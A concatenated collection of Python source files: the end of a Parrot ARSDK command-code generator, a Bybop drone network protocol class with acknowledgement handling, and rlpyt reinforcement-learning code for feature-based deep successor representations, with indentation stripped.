hfile.write(dump_arg_table(ftr, cl, cmd))
defaultCls.cmds = [cmd for cmd in (ftr.cmds + ftr.evts) if cmd.cls is None]
if ftr.classes is None:
ftr.classes = []
ftr.classes.append(defaultCls)
for cl in ftr.classes:
hfile.write(dump_cmd_table(ftr, cl))
hfile.write(dump_class_table(ftr))
hfile.write(dump_project_table(allFeatures))
hfile.write('#endif /* _ARSDK_ARCOMMANDS_TREE_H */\n')
hfile.close()
#===============================================================================
#===============================================================================
def native_list_files(ctx, outdir, paths):
# print c generated files
for f in paths.GENERATED_FILES:
print os.path.join(outdir, f)
#===============================================================================
#===============================================================================
def android_list_files(ctx, outdir, paths):
# print java enum class files
for ftr in ctx.features:
for enum in ftr.enums:
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, get_ftr_old_name(ftr), enum.name) + '.java'
for multiset in ftr.multisets:
print paths.JNIJ_OUT_DIR + ARJavaMultiSetType(LIB_MODULE, get_ftr_old_name(ftr), multiset.name) + '.java'
# print java listener class files
for ftr in ctx.features:
for cmd in ftr.cmds + ftr.evts:
print paths.JNIJ_OUT_DIR + interfaceName(ftr, cmd) + '.java'
# print java generated files
for f in paths.GENERATED_JAVA_FILES:
print os.path.join(outdir, f)
# print java enum files generated from enums C
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.java'
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + '.java'
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + '.java'
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.java'
#===============================================================================
#===============================================================================
def jni_list_files(ctx, outdir, paths):
# print c generated files
for f in paths.GENERATED_JNI_FILES:
print os.path.join(outdir, f)
#===============================================================================
#===============================================================================
def list_files(ctx, outdir, extra):
paths = Paths(outdir)
if extra == "native":
native_list_files(ctx, outdir, paths)
elif extra == "android":
android_list_files(ctx, outdir, paths)
elif extra == "jni":
jni_list_files(ctx, outdir, paths)
#===============================================================================
#===============================================================================
def generate_files(ctx, outdir, extra):
paths = Paths(outdir)
if extra == "native":
# Generation
native_generateCmds(ctx, paths)
PREBUILD_ACTION = PACKAGES_DIR+'/ARSDKBuildUtils/Utils/Python/ARSDK_PrebuildActions.py'
os.system('python '+PREBUILD_ACTION+' --lib libARCommands --root '+LIBARCOMMANDS_DIR+' --outdir '+outdir + ' --disable-java')
elif extra == "java":
# Generation
java_generateCmds(ctx, paths)
elif extra == "jni":
# Generation
jni_generateCmds(ctx, paths)
elif extra == "tree":
dump_tree_header(ctx, './tree.h')
#===============================================================================
#===============================================================================
#if __name__ == "__main__":
# generateCmds()
```
#### File: PythonController/src/Bybop_Network.py
```python
import Bybop_NetworkAL
import struct
import threading
class NetworkStatus:
OK = 0
ERROR = 1
TIMEOUT = 2
class Network(object):
"""
Simple implementation of the ARNetwork protocol.
This implementation does not support internal fifos. If multiple threads try to send data on the
same buffer at the same time, the actual send order is undefined.
The 'send_data' call is blocking to allow a simpler implementation, but it does not busy-wait, so
it can be called from a thread without locking the GIL in python implementations that use one.
This implementation uses a listener to warn the application of newly received data. The listener
should implement a 'data_received' function accepting the following arguments:
- buf : The buffer on which this data was retrieved
- recv_data : The actual data, as a packed string (use the struct module to unpack)
And a 'did_disconnect' function, without arguments, which will be called if the product
does not send any data on the network (probably because we lost the network link, or
because the product has run out of battery)
"""
def __init__(self, ip, c2d_port, d2c_port, send_buffers, recv_buffers, listener):
"""
Create a new instance of ARNetwork.
The instance will manage internally its ARNetworkAL backend.
Arguments:
- ip (string) : The device address
- c2d_port : The remote reading port
- d2c_port : The local reading port
- send_buffers : List of buffers which should accept data from the application
(i.e. which will be given to the send_data function)
- recv_buffers : List of buffers which should accept incoming data
- listener : The listener which will receive the 'data_received' / 'did_disconnect' calls
"""
self._netal = Bybop_NetworkAL.NetworkAL(ip, c2d_port, d2c_port, self)
self._listener = listener
self._send_buffers = list(send_buffers) # The application writes to these (sent to the network)
self._recv_buffers = list(recv_buffers) # The application reads from these (read from network)
self._send_seq = {}
self._recv_seq = {}
self._ack_events = {}
self._ack_seq = {}
self._buf_locks = {}
self._ack_events_lock = threading.Lock()
for sndb in self._send_buffers:
self._send_seq[sndb] = 0
self._buf_locks[sndb] = threading.Lock()
self._ack_events[sndb] = threading.Event()
self._ack_seq[sndb] = 0
for rcvb in self._recv_buffers:
self._recv_seq[rcvb] = 255
def stop(self):
"""
Stop the ARNetwork instance.
This also stops the ARNetworkAL backend.
This function has no effect on a stopped instance.
"""
self._netal.stop()
def restart(self):
"""
Restart the ARNetwork instance.
This also restarts the ARNetworkAL backend.
This function has no effect on a started instance.
"""
self._netal.start()
def _get_seq(self, buf):
if not buf in self._send_seq:
self._send_seq[buf] = 0
ret = self._send_seq[buf]
self._send_seq[buf] += 1
self._send_seq[buf] %= 256
return ret
def send_data(self, buf, data, type, timeout=0.15, tries=5):
"""
Send some data over the network, and return an ARNetworkStatus.
The keyword arguments are only used for acknowledged data.
For other data, the timeout is irrelevant, and only one try will be made.
For acknowledged data, this function will block until either the acknowledge is received,
or all the tries have been consumed in timeouts. For other data, this function returns
almost immediately.
Arguments:
- buf : The target buffer for the data (must be part of the send_buffers list given to __init__)
- data : The data to send
- type : The type of the data (needs ack or not)
Keyword arguments:
- timeout : Timeout in floating point number of seconds, or None if no timeout (default 0.15)
- tries : Total number of tries before considering a data as lost (default 5)
"""
if not buf in self._send_buffers:
return NetworkStatus.ERROR
seqnum = self._get_seq(buf)
needack = type == Bybop_NetworkAL.DataType.DATA_WITH_ACK
status = NetworkStatus.TIMEOUT
with self._buf_locks[buf]:
# If we need an ack, clear any pending ack event, and set the requested seqnum
if needack:
with self._ack_events_lock:
self._ack_events[buf].clear()
self._ack_seq[buf] = seqnum
# Try 'tries' times in case of timeouts
while tries > 0 and status == NetworkStatus.TIMEOUT:
tries -= 1
status = NetworkStatus.OK if self._netal.send_data(type, buf, seqnum, data) else NetworkStatus.ERROR
# We only set TIMEOUT status for acknowledged data
if needack and status == NetworkStatus.OK: # Data with ack properly sent
status = NetworkStatus.OK if self._ack_events[buf].wait(timeout) else NetworkStatus.TIMEOUT
return status
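# Example (hypothetical buffer id and payload), sending one acknowledged frame:
#   status = network.send_data(11, struct.pack('<B', 42),
#                              Bybop_NetworkAL.DataType.DATA_WITH_ACK)
#   # NetworkStatus.TIMEOUT here means the ack never arrived within tries * timeout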
def _send_ack(self, buf, seq):
answer = struct.pack('<B', seq)
abuf = buf + 128
self._netal.send_data(Bybop_NetworkAL.DataType.ACK, abuf, self._get_seq(abuf), answer)
def _send_pong(self, data):
self._netal.send_data(Bybop_NetworkAL.DataType.DATA, 1, self._get_seq(1), data)
def _should_accept(self, buf, seq):
if not buf in self._recv_seq:
return False
prev = self._recv_seq[buf]
diff = seq - prev
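# Accept the frame if the sequence number did not go backwards (diff >= 0) or if it
# jumped far enough back to look like a wrap of the 8-bit counter (diff <= -10);
# only the small negative window is treated as an out-of-order/duplicate frame.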
ok = diff >= 0 or diff <= -10
if ok:
self._recv_seq[buf] = seq
return ok
def data_received(self, type, buf, seq, recv_data):
"""
Implementation of the NetworkAL listener.
This function should not be called directly by application code !
"""
if buf == 0: # This is a ping, send a pong !
self._send_pong(recv_data)
if type == Bybop_NetworkAL.DataType.ACK:
ackbuf = buf - 128
if ackbuf in self._send_buffers:
seq = struct.unpack('<B', recv_data)[0]
with self._ack_events_lock:
if seq == self._ack_seq[ackbuf]:
self._ack_events[ackbuf].set()
elif type == Bybop_NetworkAL.DataType.DATA:
self._process_data(buf, seq, recv_data)
elif type == Bybop_NetworkAL.DataType.DATA_LOW_LATENCY:
self._process_data(buf, seq, recv_data)
elif type == Bybop_NetworkAL.DataType.DATA_WITH_ACK:
self._process_data(buf, seq, recv_data)
# And send ack !
self._send_ack(buf, seq)
def _process_data(self, buf, seq, recv_data):
if self._should_accept(buf, seq):
self._listener.data_received(buf, recv_data)
def did_disconnect(self):
"""
Implementation of the NetworkAL listener.
This function should not be called directly by application code !
"""
self._listener.did_disconnect()
``` |
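For illustration, a minimal listener sketch matching the interface described in the `Network` docstring above; the class name, address, ports and buffer ids are hypothetical and not part of the original sources.
```python
class PrintingListener(object):
    """Hypothetical ARNetwork listener that just logs what it receives."""

    def data_received(self, buf, recv_data):
        # recv_data is a packed string; real code would unpack it with struct
        print('received %d bytes on buffer %d' % (len(recv_data), buf))

    def did_disconnect(self):
        # Called when the product stops sending data (link lost or battery out)
        print('ARNetwork link lost')


# Hypothetical wiring; the IP, ports and buffer ids are placeholders:
# net = Network('192.168.42.1', 54321, 43210, [10, 11], [127, 126], PrintingListener())
# status = net.send_data(11, struct.pack('<B', 1), Bybop_NetworkAL.DataType.DATA_WITH_ACK)
```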
{
"source": "2016choang/sfl",
"score": 2
} |
#### File: sfl/experiments/test_multiroom.py
```python
import json
import pickle
import gym
from gym_minigrid.wrappers import ReseedWrapper, RGBImgObsWrapper
import numpy as np
import torch
from rlpyt.envs.gym import make as gym_make
from rlpyt.models.dqn.dsr.grid_dsr_model import GridDsrModel
from rlpyt.models.dqn.dsr.idf_model import IDFModel
from rlpyt.utils.seed import set_seed
ENV_ID = 'MiniGrid-FourRooms-v0'
def visualize(config_file,
checkpoint,
output,
cuda_idx=None):
try:
with open(config_file, 'r') as f:
config = json.load(f)
except ValueError:
raise ValueError('Unable to read config file {}'.format(config_file))
mode = config['mode']
seed = config['seed']
set_seed(seed)
if cuda_idx is not None:
device = torch.device('cuda', index=cuda_idx)
else:
device = torch.device('cpu')
# load in checkpoint into agent
params = torch.load(checkpoint, map_location=device)
# sample all possible agent positions within environment
env = gym_make(id=ENV_ID, mode=mode, minigrid_config=config['env'])
env.reset()
SR = torch.zeros((env.grid.height, env.grid.width, 4, env.action_space.n, config['agent']['model_kwargs']['feature_size']),
dtype=torch.float)
SR += np.nan
feature_model = IDFModel(env.observation_space.shape, env.action_space.n, **config['agent']['idf_model_kwargs'])
feature_model.load_state_dict(params['agent_state_dict']['idf_model'])
feature_model.to(device)
model = GridDsrModel(env.observation_space.shape, env.action_space.n, **config['agent']['model_kwargs'])
model.load_state_dict(params['agent_state_dict']['model'])
model.to(device)
for room in env.rooms:
start_x, start_y = room.top
size_x, size_y = room.size
for direction in range(4):
for x in range(start_x + 1, start_x + size_x - 1):
for y in range(start_y + 1, start_y + size_y - 1):
env.env.env.unwrapped.agent_pos = np.array([x, y])
env.env.env.unwrapped.agent_dir = direction
obs, _, _, _ = env.env.env.step(5)
obs = torch.Tensor(obs).unsqueeze(0)
features = feature_model(obs.to(device), mode='encode')
SR[x, y, direction] = model(features, mode='dsr')
if room.exitDoorPos is not None:
exit_door = np.array(room.exitDoorPos)
env.env.env.unwrapped.agent_pos = exit_door
env.env.env.unwrapped.agent_dir = direction
obs, _, _, _ = env.env.env.step(5)
obs = torch.Tensor(obs).unsqueeze(0)
features = feature_model(obs.to(device), mode='encode')
SR[exit_door[0], exit_door[1], direction] = model(features, mode='dsr')
env.close()
torch.save(SR, output)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', help='config file')
parser.add_argument('--checkpoint', help='checkpoint file')
parser.add_argument('--output', help='output location')
parser.add_argument('--cuda_idx', help='gpu to use ', type=int, default=0)
args = parser.parse_args()
visualize(config_file=args.config,
checkpoint=args.checkpoint,
output=args.output,
cuda_idx=args.cuda_idx)
```
#### File: dqn/dsr/feature_dsr_agent.py
```python
import numpy as np
from sklearn.manifold import TSNE
import torch
from rlpyt.agents.base import AgentStep
from rlpyt.agents.dqn.dsr.dsr_agent import DsrAgent, AgentInfo
from rlpyt.agents.dqn.mixin import Mixin
from rlpyt.models.dqn.dsr.idf_model import IDFModel
from rlpyt.models.dqn.dsr.tcf_model import TCFModel
from rlpyt.models.dqn.dsr.grid_dsr_model import GridDsrModel
from rlpyt.models.utils import strip_ddp_state_dict
from rlpyt.utils.buffer import buffer_to
from rlpyt.utils.quick_args import save__init__args
class FeatureDSRAgent(Mixin, DsrAgent):
def __init__(self, feature_model_kwargs={}, initial_feature_model_state_dict=None, **kwargs):
save__init__args(locals())
ModelCls = GridDsrModel
super().__init__(ModelCls=ModelCls, **kwargs)
self.featureModelCls = None
def to_device(self, cuda_idx=None):
super().to_device(cuda_idx)
self.feature_model.to(self.device)
def initialize(self, env_spaces, share_memory=False,
global_B=1, env_ranks=None):
super().initialize(env_spaces, share_memory,
global_B=global_B, env_ranks=env_ranks)
self.feature_model = self.featureModelCls(**self.env_model_kwargs,
**self.feature_model_kwargs)
if self.initial_feature_model_state_dict is not None:
self.feature_model.load_state_dict(self.initial_feature_model_state_dict)
def encode(self, observation):
# Encode observation into feature representation
model_inputs = buffer_to(observation,
device=self.device)
features = self.feature_model(model_inputs, mode='encode')
return features.cpu()
def state_dict(self):
return dict(model=self.model.state_dict(),
target=self.target_model.state_dict(),
feature_model=self.feature_model.state_dict())
@torch.no_grad()
def step(self, observation, prev_action, prev_reward):
if self.distribution.epsilon >= 1.0:
# Random policy
action = torch.randint_like(prev_action, high=self.distribution.dim)
else:
# Epsilon-greedy over q-values generated with SF
model_inputs = buffer_to(observation,
device=self.device)
features = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to(features,
device=self.device)
dsr = self.model(model_inputs, mode='dsr')
model_inputs = buffer_to(dsr,
device=self.device)
q = self.model(model_inputs, mode='q')
q = q.cpu()
action = self.distribution.sample(q)
agent_info = AgentInfo(a=action)
return AgentStep(action=action, agent_info=agent_info)
def dsr_parameters(self):
return [param for name, param in self.model.named_parameters()]
def feature_parameters(self):
return [param for name, param in self.feature_model.named_parameters()]
@torch.no_grad()
def get_representations(self, env):
# Get features and SFs of possible observations
h, w = env.grid.height, env.grid.width
features = torch.zeros((h, w, 4, self.feature_model.feature_size), dtype=torch.float)
features += np.nan
dsr = torch.zeros((h, w, 4, env.action_space.n, self.model.feature_size), dtype=torch.float)
dsr += np.nan
for pos in env.get_possible_pos():
x, y = pos
for direction in range(4):
env.unwrapped.agent_pos = np.array([x, y])
env.unwrapped.agent_dir = direction
obs, _, _, _ = env.get_current_state()
model_inputs = buffer_to(torch.Tensor(obs).unsqueeze(0),
device=self.device)
features[x, y, direction] = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to(features[x, y, direction],
device=self.device)
dsr[x, y, direction] = self.model(model_inputs, mode='dsr')
return features, dsr
@torch.no_grad()
def get_representation_heatmap(self, representation, subgoal=(4, 13), mean_axes=(2, 3), distance='cos'):
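# Similarity of each grid cell's representation (averaged over mean_axes) to the
# subgoal cell's, as a heatmap: cosine (dot product of L2-normalized vectors) or L2 distance.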
representation = representation.detach().numpy()
representation_matrix = representation.mean(axis=mean_axes)
representation_matrix = representation_matrix / np.linalg.norm(representation_matrix, ord=2, axis=2, keepdims=True)
subgoal_representation = representation_matrix[subgoal]
side_size = representation_matrix.shape[0]
heatmap = np.zeros((side_size, side_size))
for x in range(side_size):
for y in range(side_size):
if distance == 'cos':
heatmap[x, y] = np.dot(representation_matrix[x, y], subgoal_representation)
elif distance == 'l2':
heatmap[x, y] = np.linalg.norm(representation_matrix[x, y] - subgoal_representation, ord=2)
else:
raise NotImplementedError
return heatmap
@torch.no_grad()
def get_q_values(self, env, dsr, subgoal=(4, 13), mean_axes=(2, )):
dsr = dsr.detach().numpy()
dsr_matrix = dsr.mean(axis=mean_axes)
dsr_matrix = dsr_matrix / np.linalg.norm(dsr_matrix, ord=2, axis=3, keepdims=True)
subgoal_dsr = dsr_matrix[subgoal].mean(axis=0)
q_values = np.dot(dsr_matrix, subgoal_dsr)
return q_values
@torch.no_grad()
def get_tsne(self, env, representation, mean_axes=(2, 3)):
h, w = env.grid.height, env.grid.width
representation = representation.detach().numpy()
representation_matrix = np.nanmean(representation, axis=mean_axes)
valid_representations = representation_matrix.reshape(h * w, -1)
walls = np.isnan(valid_representations).any(axis=1)
valid_representations = valid_representations[~walls]
embeddings = TSNE(n_components=2).fit_transform(valid_representations)
rooms = np.zeros((h, w))
if hasattr(env, 'rooms'):
for i, room in enumerate(env.rooms, 1):
start_x, start_y = room.top
size_x, size_y = room.size
for x in range(start_x + 1, start_x + size_x - 1):
for y in range(start_y + 1, start_y + size_y - 1):
rooms[x, y] = i
rooms = rooms.reshape(h * w)[~walls]
return embeddings, rooms
def train_mode(self, itr):
super().train_mode(itr)
self.feature_model.train()
def sample_mode(self, itr):
super().sample_mode(itr)
self.feature_model.eval()
def eval_mode(self, itr):
super().eval_mode(itr)
self.feature_model.eval()
class IDFDSRAgent:
def __init__(self):
self.featureModelCls = IDFModel
def inverse_dynamics(self, observation, next_observation):
model_inputs = buffer_to(observation,
device=self.device)
features = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to(next_observation,
device=self.device)
next_features = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to((features, next_features),
device=self.device)
pred_actions = self.feature_model(*model_inputs, mode='inverse')
return pred_actions.cpu()
class TCFDSRAgent:
def __init__(self):
self.featureModelCls = TCFModel
```
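The `'cos'` branch of `get_representation_heatmap` above L2-normalizes each averaged feature vector before taking dot products with the subgoal cell, so the heatmap entries are cosine similarities. A minimal sanity check of that identity (an editor's sketch with made-up data, not code from the repository):
```python
import numpy as np

feats = np.random.randn(5, 8)
feats = feats / np.linalg.norm(feats, ord=2, axis=1, keepdims=True)  # unit-norm rows
subgoal = feats[3]
dot_scores = feats @ subgoal  # what the 'cos' branch computes after normalization
cosine = np.array([np.dot(v, subgoal) / (np.linalg.norm(v) * np.linalg.norm(subgoal))
                   for v in feats])
print(np.allclose(dot_scores, cosine))  # True
```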
#### File: agents/dqn/mixin.py
```python
class Mixin:
def make_env_to_model_kwargs(self, env_spaces):
return dict(image_shape=env_spaces.observation.shape,
output_size=env_spaces.action.n)
```
#### File: dqn/dsr/action_dsr.py
```python
from collections import namedtuple
import torch
import torch.nn as nn
from rlpyt.algos.dqn.dsr.dsr import DSR
from rlpyt.algos.utils import valid_from_done
from rlpyt.utils.tensor import select_at_indexes, valid_mean
OptInfo = namedtuple("OptInfo", ["dsrLoss", "dsrGradNorm", "tdAbsErr"])
class ActionDSR(DSR):
"""Action DSR."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
def dsr_loss(self, samples):
"""Samples have leading batch dimension [B,..] (but not time)."""
# 1a. encode observations in feature space
with torch.no_grad():
features = self.agent.encode(samples.agent_inputs.observation)
features = select_at_indexes(samples.action[:, 0], features)
# 1b. estimate successor features given features
s_features = self.agent(features)
with torch.no_grad():
# 2a. encode target observations in feature space
target_features = self.agent.encode(samples.target_inputs.observation)
next_a = torch.randint(high=target_features.shape[1], size=samples.action[:, 0].shape)
target_features = select_at_indexes(next_a, target_features)
# 2b. estimate target successor features given features
target_s_features = self.agent.target(target_features)
# 3. combine current features + discounted target successor features
disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features
y = features + (1 - samples.done_n.float()).view(-1, 1) * disc_target_s_features
delta = y - s_features
losses = 0.5 * delta ** 2
abs_delta = abs(delta)
if self.delta_clip is not None: # Huber loss.
b = self.delta_clip * (abs_delta - self.delta_clip / 2)
losses = torch.where(abs_delta <= self.delta_clip, losses, b)
# if self.prioritized_replay:
# losses *= samples.is_weights
# sum losses over feature vector such that each sample has a scalar loss (result: B x 1)
# losses = losses.sum(dim=1)
td_abs_errors = abs_delta.detach()
if self.delta_clip is not None:
td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip)
if not self.mid_batch_reset:
valid = valid_from_done(samples.done)
loss = valid_mean(losses, valid)
td_abs_errors *= valid
else:
loss = torch.mean(losses)
return loss, td_abs_errors
```
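As a reading aid for `ActionDSR.dsr_loss` above: the target it assembles is the n-step successor-feature backup, roughly `y = phi(s) + gamma**n * (1 - done) * psi_target(s', a')`, with Huber-style clipping applied elementwise to the TD error. A minimal sketch with made-up shapes (an editor's illustration, not code from the repository):
```python
import torch

batch, feat = 4, 16
discount, n_step, delta_clip = 0.99, 1, 1.0
phi = torch.randn(batch, feat)           # encoded features of s
psi = torch.randn(batch, feat)           # current SF estimate psi(s, a)
psi_target = torch.randn(batch, feat)    # target-network SF at (s', a')
done = torch.zeros(batch, 1)

y = phi + (1 - done) * (discount ** n_step) * psi_target   # TD target
delta = y - psi
losses = torch.where(delta.abs() <= delta_clip,
                     0.5 * delta ** 2,
                     delta_clip * (delta.abs() - delta_clip / 2))  # Huber clipping
loss = losses.mean()
```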
#### File: dqn/dsr/feature_dsr.py
```python
from collections import namedtuple
import torch
import torch.nn as nn
from rlpyt.algos.dqn.dsr.dsr import DSR
from rlpyt.replays.non_sequence.uniform import (UniformReplayBuffer,
AsyncUniformReplayBuffer, LandmarkUniformReplayBuffer,
UniformTripletReplayBuffer)
from rlpyt.utils.collections import namedarraytuple
from rlpyt.utils.logging import logger
from rlpyt.utils.misc import param_norm_
from rlpyt.utils.quick_args import save__init__args
from rlpyt.utils.tensor import select_at_indexes, valid_mean
from rlpyt.algos.utils import valid_from_done
FeatureOptInfo = namedtuple("FeateureOptInfo", ["featureLoss", "featureGradNorm",
"dsrLoss", "dsrGradNorm", "tdAbsErr"])
class FeatureDSR(DSR):
"""Feature-based DSR."""
def __init__(
self,
feature_learning_rate=2.5e4,
max_steps_feature_learn=None,
min_steps_dsr_learn=int(5e4),
**kwargs):
super().__init__(**kwargs)
save__init__args(locals())
def initialize(self, agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size=1, rank=0):
super().initialize(agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size, rank)
if self.max_steps_feature_learn is not None:
self.max_itr_feature_learn = int(self.max_steps_feature_learn // self.sampler_bs)
else:
self.max_itr_feature_learn = None
self.min_itr_dsr_learn = int(self.min_steps_dsr_learn // self.sampler_bs)
def optim_initialize(self, rank=0):
"""Called by async runner."""
self.rank = rank
self.dsr_optimizer = self.OptimCls(self.agent.dsr_parameters(),
lr=self.learning_rate, **self.optim_kwargs)
self.feature_optimizer = self.OptimCls(self.agent.feature_parameters(),
lr=self.feature_learning_rate, **self.optim_kwargs)
if self.initial_optim_state_dict is not None:
self.dsr_optimizer.load_state_dict(self.initial_optim_state_dict['dsr'])
self.feature_optimizer.load_state_dict(self.initial_optim_state_dict['feature'])
# if self.prioritized_replay:
# self.pri_beta_itr = max(1, self.pri_beta_steps // self.sampler_bs)
def initialize_replay_buffer(self, examples, batch_spec, async_=False):
super().initialize_replay_buffer(examples, batch_spec, async_)
self.feature_replay_buffer = None
def optim_state_dict(self):
"""If carrying multiple optimizers, overwrite to return dict state_dicts."""
return {'dsr': self.dsr_optimizer.state_dict(),
'feature': self.feature_optimizer.state_dict()}
def append_feature_samples(self, samples=None):
# Append samples to replay buffer used for training feature representation only
if samples is not None and self.feature_replay_buffer is not None:
samples_to_buffer = self.samples_to_buffer(samples)
self.feature_replay_buffer.append_samples(samples_to_buffer)
def append_dsr_samples(self, samples=None):
# Append samples to replay buffer used for training successor features
if samples is not None:
samples_to_buffer = self.samples_to_buffer(samples)
self.replay_buffer.append_samples(samples_to_buffer)
def optimize_agent(self, itr, sampler_itr=None):
itr = itr if sampler_itr is None else sampler_itr # Async uses sampler_itr.
opt_info = self.opt_info_class(*([] for _ in range(len(self.opt_info_class._fields))))
if itr < self.min_itr_learn:
# Not enough samples have been collected
return opt_info
for _ in range(self.updates_per_optimize):
samples_from_replay = self.replay_buffer.sample_batch(self.batch_size)
if self.max_itr_feature_learn is None or itr < self.max_itr_feature_learn:
# Train feature representation
if self.feature_replay_buffer:
feature_samples_from_replay = self.feature_replay_buffer.sample_batch(self.batch_size)
else:
feature_samples_from_replay = samples_from_replay
self.feature_optimizer.zero_grad()
feature_loss, feature_opt_info = self.feature_loss(feature_samples_from_replay)
feature_loss.backward()
feature_grad_norm = torch.nn.utils.clip_grad_norm_(
self.agent.feature_parameters(), self.clip_grad_norm)
self.feature_optimizer.step()
opt_info.featureLoss.append(feature_loss.item())
opt_info.featureGradNorm.append(feature_grad_norm)
for key, value in feature_opt_info.items():
getattr(opt_info, key).append(value)
if itr >= self.min_itr_dsr_learn:
# Train successor feature representation
self.dsr_optimizer.zero_grad()
dsr_loss, td_abs_errors = self.dsr_loss(samples_from_replay)
dsr_loss.backward()
dsr_grad_norm = torch.nn.utils.clip_grad_norm_(
self.agent.dsr_parameters(), self.clip_grad_norm)
self.dsr_optimizer.step()
opt_info.dsrLoss.append(dsr_loss.item())
opt_info.dsrGradNorm.append(dsr_grad_norm)
opt_info.tdAbsErr.extend(td_abs_errors[::8].numpy()) # Downsample.
self.update_counter += 1
if self.update_counter % self.target_update_interval == 0:
self.agent.update_target()
self.update_itr_hyperparams(itr)
return opt_info
def feature_loss(self, samples_from_replay):
raise NotImplementedError
IDFOptInfo = namedtuple("IDFOptInfo", ["idfAccuracy"] + list(FeatureOptInfo._fields))
class IDFDSR(FeatureDSR):
"""Inverse Dynamics Features DSR."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.opt_info_class = IDFOptInfo
self.opt_info_fields = tuple(f for f in self.opt_info_class._fields)
self.cross_entropy_loss = nn.CrossEntropyLoss()
def feature_loss(self, samples):
# Inverse dynamics prediction loss
pred_actions = self.agent.inverse_dynamics(samples.agent_inputs.observation,
samples.target_inputs.observation)
loss = self.cross_entropy_loss(pred_actions, samples.action)
with torch.no_grad():
accuracy = ((pred_actions.argmax(dim=1) == samples.action).sum().float() / samples.action.shape[0]) * 100
feature_opt_info = {'idfAccuracy': accuracy.item()}
return loss, feature_opt_info
TCFOptInfo = namedtuple("TCFOptInfo", ["posDistance", "negDistance"] + list(FeatureOptInfo._fields))
SamplesToBuffer = namedarraytuple("SamplesToBuffer",
["observation", "action", "reward", "done", "mode"])
class LandmarkTCFDSR(FeatureDSR):
"""Time Contrastive Features DSR."""
def __init__(
self,
pos_threshold=3,
neg_close_threshold=15,
neg_far_threshold=30,
margin=2.0,
**kwargs):
save__init__args(locals())
super().__init__(**kwargs)
self.opt_info_class = TCFOptInfo
self.opt_info_fields = tuple(f for f in self.opt_info_class._fields)
def initialize(self, agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size=1, rank=0):
super().initialize(agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size, rank)
self.initialize_triplet_replay_buffer(examples, batch_spec)
def initialize_replay_buffer(self, examples, batch_spec, async_=False):
example_to_buffer = SamplesToBuffer(
observation=examples["observation"],
action=examples["action"],
reward=examples["reward"],
done=examples["done"],
mode=examples["agent_info"].mode,
)
replay_kwargs = dict(
example=example_to_buffer,
size=self.replay_size,
B=batch_spec.B,
discount=self.discount,
n_step_return=self.n_step_return,
)
# if self.prioritized_replay:
# replay_kwargs.update(dict(
# alpha=self.pri_alpha,
# beta=self.pri_beta_init,
# default_priority=self.default_priority,
# ))
# ReplayCls = (AsyncPrioritizedReplayFrameBuffer if async_ else
# PrioritizedReplayFrameBuffer)
# else:
# ReplayCls = (AsyncUniformReplayFrameBuffer if async_ else
# UniformReplayFrameBuffer)
ReplayCls = (AsyncUniformReplayBuffer if async_ else
LandmarkUniformReplayBuffer)
self.replay_buffer = ReplayCls(**replay_kwargs)
self.feature_replay_buffer = None
def initialize_triplet_replay_buffer(self, examples, batch_spec, async_=False):
example_to_buffer = SamplesToBuffer(
observation=examples["observation"],
action=examples["action"],
reward=examples["reward"],
done=examples["done"],
mode=examples["agent_info"].mode,
)
triplet_replay_kwargs = dict(
example=example_to_buffer,
size=self.replay_size,
B=batch_spec.B,
pos_threshold=self.pos_threshold,
neg_close_threshold=self.neg_close_threshold,
neg_far_threshold=self.neg_far_threshold
)
self.feature_replay_buffer = UniformTripletReplayBuffer(**triplet_replay_kwargs)
def samples_to_buffer(self, samples):
return SamplesToBuffer(
observation=samples.env.observation,
action=samples.agent.action,
reward=samples.env.reward,
done=samples.env.done,
mode=samples.agent.agent_info.mode
)
def feature_loss(self, samples):
# Time contrastive loss
anchor_embeddings = self.agent.encode(samples.anchor)
pos_embeddings = self.agent.encode(samples.pos)
neg_embeddings = self.agent.encode(samples.neg)
pos_dist = torch.norm(anchor_embeddings - pos_embeddings, p=2, dim=1)
neg_dist = torch.norm(anchor_embeddings - neg_embeddings, p=2, dim=1)
loss = torch.clamp(self.margin + pos_dist - neg_dist, min=0.0).mean()
with torch.no_grad():
feature_opt_info = {"posDistance": pos_dist.mean().item(),
"negDistance": neg_dist.mean().item()}
return loss, feature_opt_info
def dsr_loss(self, samples):
"""Samples have leading batch dimension [B,..] (but not time)."""
# 1a. encode observations in feature space
with torch.no_grad():
features = self.agent.encode(samples.agent_inputs.observation)
# 1b. estimate successor features given features
dsr = self.agent(features)
s_features = select_at_indexes(samples.action, dsr)
with torch.no_grad():
# 2a. encode target observations in feature space
target_features = self.agent.encode(samples.target_inputs.observation)
# 2b. estimate target successor features given features
target_dsr = self.agent.target(target_features)
# next_qs = self.agent.q_estimate(target_dsr)
# next_a = torch.argmax(next_qs, dim=-1)
# random actions
next_a = torch.randint(high=target_dsr.shape[1], size=samples.action.shape)
target_s_features = select_at_indexes(next_a, target_dsr)
# 3. combine current features + discounted target successor features
done_n = samples.done_n.float().view(-1, 1)
disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features
s_y = target_features + (1 - samples.target_done.float()).view(-1, 1) * disc_target_s_features
y = features * done_n + (1 - done_n) * s_y
delta = y - s_features
losses = 0.5 * delta ** 2
abs_delta = abs(delta)
if self.delta_clip is not None: # Huber loss.
b = self.delta_clip * (abs_delta - self.delta_clip / 2)
